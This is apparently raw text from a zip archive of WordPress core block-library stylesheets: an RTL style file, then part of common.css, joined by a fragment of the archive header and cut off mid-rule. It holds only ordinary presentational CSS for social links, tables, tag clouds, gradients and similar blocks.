.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{ font-size:24px; } .wp-block-social-links.has-large-icon-size{ font-size:36px; } .wp-block-social-links.has-huge-icon-size{ font-size:48px; } .wp-block-social-links.aligncenter{ display:flex; justify-content:center; } .wp-block-social-links.alignright{ justify-content:flex-end; } .wp-block-social-link{ border-radius:9999px; display:block; } @media not (prefers-reduced-motion){ .wp-block-social-link{ transition:transform .1s ease; } } .wp-block-social-link{ height:auto; } .wp-block-social-link a{ align-items:center; display:flex; line-height:0; } .wp-block-social-link:hover{ transform:scale(1.1); } .wp-block-social-links .wp-block-social-link.wp-social-link{ display:inline-block; margin:0; padding:0; } .wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor svg,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:active,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:visited{ color:currentColor; fill:currentColor; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link{ background-color:#f0f0f0; color:#444; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-amazon{ background-color:#f90; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bandcamp{ background-color:#1ea0c3; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-behance{ background-color:#0757fe; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bluesky{ background-color:#0a7aff; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-codepen{ background-color:#1e1f26; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-deviantart{ background-color:#02e49b; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-discord{ background-color:#5865f2; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dribbble{ background-color:#e94c89; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dropbox{ background-color:#4280ff; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-etsy{ background-color:#f45800; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-facebook{ background-color:#0866ff; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-fivehundredpx{ background-color:#000; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-flickr{ background-color:#0461dd; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-foursquare{ background-color:#e65678; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-github{ background-color:#24292d; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-goodreads{ background-color:#eceadd; color:#382110; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-google{ background-color:#ea4434; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-gravatar{ background-color:#1d4fc4; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-instagram{ background-color:#f00075; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-lastfm{ background-color:#e21b24; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-linkedin{ background-color:#0d66c2; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-mastodon{ background-color:#3288d4; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-medium{ background-color:#000; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-meetup{ background-color:#f6405f; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-patreon{ background-color:#000; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pinterest{ background-color:#e60122; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pocket{ background-color:#ef4155; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-reddit{ background-color:#ff4500; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-skype{ background-color:#0478d7; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-snapchat{ background-color:#fefc00; color:#fff; stroke:#000; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-soundcloud{ background-color:#ff5600; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-spotify{ background-color:#1bd760; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-telegram{ background-color:#2aabee; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-threads{ background-color:#000; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tiktok{ background-color:#000; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tumblr{ background-color:#011835; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitch{ background-color:#6440a4; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitter{ background-color:#1da1f2; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vimeo{ background-color:#1eb7ea; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vk{ background-color:#4680c2; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-wordpress{ background-color:#3499cd; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-whatsapp{ background-color:#25d366; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-x{ background-color:#000; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-yelp{ background-color:#d32422; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-youtube{ background-color:red; color:#fff; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link{ background:none; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link svg{ height:1.25em; width:1.25em; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-amazon{ color:#f90; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bandcamp{ color:#1ea0c3; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-behance{ color:#0757fe; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bluesky{ color:#0a7aff; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-codepen{ color:#1e1f26; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-deviantart{ color:#02e49b; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-discord{ color:#5865f2; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dribbble{ color:#e94c89; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dropbox{ color:#4280ff; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-etsy{ color:#f45800; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-facebook{ color:#0866ff; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-fivehundredpx{ color:#000; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-flickr{ color:#0461dd; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-foursquare{ color:#e65678; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-github{ color:#24292d; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-goodreads{ color:#382110; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-google{ color:#ea4434; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-gravatar{ color:#1d4fc4; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-instagram{ color:#f00075; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-lastfm{ color:#e21b24; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-linkedin{ color:#0d66c2; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-mastodon{ color:#3288d4; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-medium{ color:#000; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-meetup{ color:#f6405f; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-patreon{ color:#000; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pinterest{ color:#e60122; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pocket{ color:#ef4155; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-reddit{ color:#ff4500; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-skype{ color:#0478d7; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-snapchat{ color:#fff; stroke:#000; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-soundcloud{ color:#ff5600; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-spotify{ color:#1bd760; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-telegram{ color:#2aabee; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-threads{ color:#000; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tiktok{ color:#000; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tumblr{ color:#011835; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitch{ color:#6440a4; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitter{ color:#1da1f2; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vimeo{ color:#1eb7ea; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vk{ color:#4680c2; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-whatsapp{ color:#25d366; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-wordpress{ color:#3499cd; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-x{ color:#000; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-yelp{ color:#d32422; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-youtube{ color:red; } .wp-block-social-links.is-style-pill-shape .wp-social-link{ width:auto; } :root :where(.wp-block-social-links .wp-social-link a){ padding:.25em; } :root :where(.wp-block-social-links.is-style-logos-only .wp-social-link a){ padding:0; } :root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link a){ padding-left:.6666666667em; padding-right:.6666666667em; } .wp-block-social-links:not(.has-icon-color):not(.has-icon-background-color) .wp-social-link-snapchat .wp-block-social-link-label{ color:#000; } .wp-block-spacer{ clear:both; } .wp-block-tag-cloud{ box-sizing:border-box; } .wp-block-tag-cloud.aligncenter{ justify-content:center; text-align:center; } .wp-block-tag-cloud a{ display:inline-block; margin-left:5px; } .wp-block-tag-cloud span{ display:inline-block; margin-right:5px; text-decoration:none; } :root :where(.wp-block-tag-cloud.is-style-outline){ display:flex; flex-wrap:wrap; gap:1ch; } :root :where(.wp-block-tag-cloud.is-style-outline a){ border:1px solid; font-size:unset !important; margin-left:0; padding:1ch 2ch; text-decoration:none !important; } .wp-block-table{ overflow-x:auto; } .wp-block-table table{ border-collapse:collapse; width:100%; } .wp-block-table thead{ border-bottom:3px solid; } .wp-block-table tfoot{ border-top:3px solid; } .wp-block-table td,.wp-block-table th{ border:1px solid; padding:.5em; } .wp-block-table .has-fixed-layout{ table-layout:fixed; width:100%; } .wp-block-table .has-fixed-layout td,.wp-block-table .has-fixed-layout th{ word-break:break-word; } .wp-block-table.aligncenter,.wp-block-table.alignleft,.wp-block-table.alignright{ display:table; width:auto; } .wp-block-table.aligncenter td,.wp-block-table.aligncenter th,.wp-block-table.alignleft td,.wp-block-table.alignleft th,.wp-block-table.alignright td,.wp-block-table.alignright th{ word-break:break-word; } .wp-block-table .has-subtle-light-gray-background-color{ background-color:#f3f4f5; } .wp-block-table .has-subtle-pale-green-background-color{ background-color:#e9fbe5; } .wp-block-table .has-subtle-pale-blue-background-color{ background-color:#e7f5fe; } .wp-block-table .has-subtle-pale-pink-background-color{ background-color:#fcf0ef; } .wp-block-table.is-style-stripes{ background-color:initial; border-collapse:inherit; border-spacing:0; } .wp-block-table.is-style-stripes tbody tr:nth-child(odd){ background-color:#f0f0f0; } .wp-block-table.is-style-stripes.has-subtle-light-gray-background-color tbody tr:nth-child(odd){ background-color:#f3f4f5; } .wp-block-table.is-style-stripes.has-subtle-pale-green-background-color tbody tr:nth-child(odd){ background-color:#e9fbe5; } .wp-block-table.is-style-stripes.has-subtle-pale-blue-background-color tbody tr:nth-child(odd){ background-color:#e7f5fe; } .wp-block-table.is-style-stripes.has-subtle-pale-pink-background-color tbody tr:nth-child(odd){ background-color:#fcf0ef; } .wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{ border-color:#0000; } .wp-block-table.is-style-stripes{ border-bottom:1px solid #f0f0f0; } .wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-block-table .has-border-color tr,.wp-block-table .has-border-color>*{ border-color:inherit; } .wp-block-table table[style*=border-top-color] tr:first-child,.wp-block-table table[style*=border-top-color] tr:first-child td,.wp-block-table table[style*=border-top-color] tr:first-child th,.wp-block-table table[style*=border-top-color]>*,.wp-block-table table[style*=border-top-color]>* td,.wp-block-table table[style*=border-top-color]>* th{ border-top-color:inherit; } .wp-block-table table[style*=border-top-color] tr:not(:first-child){ border-top-color:initial; } .wp-block-table table[style*=border-right-color] td:last-child,.wp-block-table table[style*=border-right-color] th,.wp-block-table table[style*=border-right-color] tr,.wp-block-table table[style*=border-right-color]>*{ border-left-color:inherit; } .wp-block-table table[style*=border-bottom-color] tr:last-child,.wp-block-table table[style*=border-bottom-color] tr:last-child td,.wp-block-table table[style*=border-bottom-color] tr:last-child th,.wp-block-table table[style*=border-bottom-color]>*,.wp-block-table table[style*=border-bottom-color]>* td,.wp-block-table table[style*=border-bottom-color]>* th{ border-bottom-color:inherit; } .wp-block-table table[style*=border-bottom-color] tr:not(:last-child){ border-bottom-color:initial; } .wp-block-table table[style*=border-left-color] td:first-child,.wp-block-table table[style*=border-left-color] th,.wp-block-table table[style*=border-left-color] tr,.wp-block-table table[style*=border-left-color]>*{ border-right-color:inherit; } .wp-block-table table[style*=border-style] td,.wp-block-table table[style*=border-style] th,.wp-block-table table[style*=border-style] tr,.wp-block-table table[style*=border-style]>*{ border-style:inherit; } .wp-block-table table[style*=border-width] td,.wp-block-table table[style*=border-width] th,.wp-block-table table[style*=border-width] tr,.wp-block-table table[style*=border-width]>*{ border-style:inherit; border-width:inherit; } :root :where(.wp-block-table-of-contents){ box-sizing:border-box; } .wp-block-term-count{ box-sizing:border-box; } :where(.wp-block-term-description){ box-sizing:border-box; margin-bottom:var(--wp--style--block-gap); margin-top:var(--wp--style--block-gap); } .wp-block-term-description p{ margin-bottom:0; margin-top:0; } .wp-block-term-name,.wp-block-term-template{ box-sizing:border-box; } .wp-block-term-template{ list-style:none; margin-bottom:0; margin-top:0; max-width:100%; padding:0; } .wp-block-text-columns,.wp-block-text-columns.aligncenter{ display:flex; } .wp-block-text-columns .wp-block-column{ margin:0 1em; padding:0; } .wp-block-text-columns .wp-block-column:first-child{ margin-right:0; } .wp-block-text-columns .wp-block-column:last-child{ margin-left:0; } .wp-block-text-columns.columns-2 .wp-block-column{ width:50%; } .wp-block-text-columns.columns-3 .wp-block-column{ width:33.3333333333%; } .wp-block-text-columns.columns-4 .wp-block-column{ width:25%; } pre.wp-block-verse{ overflow:auto; white-space:pre-wrap; } :where(pre.wp-block-verse){ font-family:inherit; } .wp-block-video{ box-sizing:border-box; } .wp-block-video video{ height:auto; vertical-align:middle; width:100%; } @supports (position:sticky){ .wp-block-video [poster]{ object-fit:cover; } } .wp-block-video.aligncenter{ text-align:center; } .wp-block-video :where(figcaption){ margin-bottom:1em; margin-top:.5em; } .editor-styles-wrapper,.entry-content{ counter-reset:footnotes; } a[data-fn].fn{ counter-increment:footnotes; display:inline-flex; font-size:smaller; text-decoration:none; text-indent:-9999999px; vertical-align:super; } a[data-fn].fn:after{ content:"[" counter(footnotes) "]"; float:right; text-indent:0; } :root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .wp-element-button{ cursor:pointer; } :root .has-very-light-gray-background-color{ background-color:#eee; } :root .has-very-dark-gray-background-color{ background-color:#313131; } :root .has-very-light-gray-color{ color:#eee; } :root .has-very-dark-gray-color{ color:#313131; } :root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{ background:linear-gradient(-135deg, #00d084, #0693e3); } :root .has-purple-crush-gradient-background{ background:linear-gradient(-135deg, #34e2e4, #4721fb 50%, #ab1dfe); } :root .has-hazy-dawn-gradient-background{ background:linear-gradient(-135deg, #faaca8, #dad0ec); } :root .has-subdued-olive-gradient-background{ background:linear-gradient(-135deg, #fafae1, #67a671); } :root .has-atomic-cream-gradient-background{ background:linear-gradient(-135deg, #fdd79a, #004a59); } :root .has-nightshade-gradient-background{ background:linear-gradient(-135deg, #330968, #31cdcf); } :root .has-midnight-gradient-background{ background:linear-gradient(-135deg, #020381, #2874fc); } :root{ --wp--preset--font-size--normal:16px; --wp--preset--font-size--huge:42px; } .has-regular-font-size{ font-size:1em; } .has-larger-font-size{ font-size:2.625em; } .has-normal-font-size{ font-size:var(--wp--preset--font-size--normal); } .has-huge-font-size{ font-size:var(--wp--preset--font-size--huge); } .has-text-align-center{ text-align:center; } .has-text-align-left{ text-align:left; } .has-text-align-right{ text-align:right; } .has-fit-text{ white-space:nowrap !important; } #end-resizable-editor-section{ display:none; } .aligncenter{ clear:both; } .items-justified-left{ justify-content:flex-start; } .items-justified-center{ justify-content:center; } .items-justified-right{ justify-content:flex-end; } .items-justified-space-between{ justify-content:space-between; } .screen-reader-text{ border:0; clip-path:inset(50%); height:1px; margin:-1px; overflow:hidden; padding:0; position:absolute; width:1px; word-wrap:normal !important; } .screen-reader-text:focus{ background-color:#ddd; clip-path:none; color:#444; display:block; font-size:1em; height:auto; line-height:normal; padding:15px 23px 14px; right:5px; text-decoration:none; top:5px; width:auto; z-index:100000; } html :where(.has-border-color){ border-style:solid; } html :where([style*=border-top-color]){ border-top-style:solid; } html :where([style*=border-right-color]){ border-left-style:solid; } html :where([style*=border-bottom-color]){ border-bottom-style:solid; } html :where([style*=border-left-color]){ border-right-style:solid; } html :where([style*=border-width]){ border-style:solid; } html :where([style*=border-top-width]){ border-top-style:solid; } html :where([style*=border-right-width]){ border-left-style:solid; } html :where([style*=border-bottom-width]){ border-bottom-style:solid; } html :where([style*=border-left-width]){ border-right-style:solid; } html :where(img[class*=wp-image-]){ height:auto; max-width:100%; } :where(figure){ margin:0 0 1em; } html :where(.is-position-sticky){ --wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height, 0px); } @media screen and (max-width:600px){ html :where(.is-position-sticky){ --wp-admin--admin-bar--position-offset:0px; } }PK!9%dddist/block-library/common.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .wp-element-button{ cursor:pointer; } :root .has-very-light-gray-background-color{ background-color:#eee; } :root .has-very-dark-gray-background-color{ background-color:#313131; } :root .has-very-light-gray-color{ color:#eee; } :root .has-very-dark-gray-color{ color:#313131; } :root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{ background:linear-gradient(135deg, #00d084, #0693e3); } :root .has-purple-crush-gradient-background{ background:linear-gradient(135deg, #34e2e4, #4721fb 50%, #ab1dfe); } :root .has-hazy-dawn-gradient-background{ background:linear-gradient(135deg, #faaca8, #dad0ec); } :root .has-subdued-olive-gradient-background{ background:linear-gradient(135de